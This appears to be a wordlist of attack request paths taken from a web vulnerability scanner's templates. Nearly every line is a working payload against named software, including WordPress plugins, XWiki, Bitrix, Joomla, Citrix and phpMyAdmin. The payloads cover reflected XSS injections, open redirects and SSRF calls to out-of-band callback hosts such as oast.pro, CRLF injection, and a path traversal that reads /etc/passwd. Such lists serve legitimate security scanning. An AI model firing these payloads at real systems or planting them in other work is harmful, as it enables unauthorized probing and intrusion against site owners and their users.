/api/logout?redirect_to=http://oast.pro/
/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test
/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft
/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/wp-content/uploads/ao_ccss/queuelog.html
/blog/wp-content/uploads/ao_ccss/queuelog.html
/wp-json/download-monitor/v1/user_data
/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E
/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E
/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me
/wp-content/plugins/all-in-one-seo-pack/readme.txt
/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>
/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg
/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/api/index.php/v1/config/application?public=true
/api/v1/config/application?public=true
/login.php
/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small
/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert(
/jsps/genrequest.jsp?routineName=
/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E
/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>
/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or
/pmb/opac_css/pmb.php?url=https://oast.me&hash={{md5(
/phpmyadmin/
/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1
/?s={{str}}%3CIMG%20%22%22%22%3E%3CIMG%20SRC=/%20onerror=%22alert(document.domain)%22%3E%3C/img%3E/{{random}}/
/cas/logout?url=https://oast.pro
/index.php?userName=%22%3E%3Cscript%3Econfirm(1)%3C/script%3E
/cpanelwebcall/<img%20src=x%20onerror=
/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}
/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>
/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>
/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d
/default.aspx?years=http://oast.pro
/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm
/templates/pages/debug_panel.php?id={{randstr}}
/xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)
/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)
/xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)
/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)
/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/print.php?nm_member=<script>alert(document.location)</script>
/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27
/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27
/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number=
/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model
/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ef26v4?mode=model
/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l
/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity
/users/viewi1omd
/find-a-matchpksyk
/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E
/webmail/?mid={{to_lower(rand_base(4))}}
/webmail/?color=
/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E
/%5coast.pro/%2f%2e%2e
/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0
/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0&session_id=
/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1
/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date=
/index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=%22><script>alert(document.domain)</script>
/classified/%22%3E%3Cimg%20src=a%20onerror=alert(
/search/index?q=
/stores
/user_info
/faqs
/classifieds
/users/test%22%3E%3Cimg%20src=a%20onerror=alert(document.domain)%3Etest
/users/change_emailahrixia%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3eahrixia?step1=1
/install/index.php?1692443074&space=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
/search?filtered=1&q=test&filter[price]=100-1331
/search?filter[brandid]=vnxjb
/search/index/?q=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest
/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27
/project/switch/1?targetPath=http://oast.pro
/bitrix/components/bitrix/mobileapp.list/ajax.php?items[1][TITLE]=TEXT+INJECTION!+PLEASE+CLICK+HERE!&items[1][DETAIL_LINK]=https://metascan.ru
/bitrix/tools/imagepg.php?img=//metascan.ru/assets/images/logo.svg
/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(
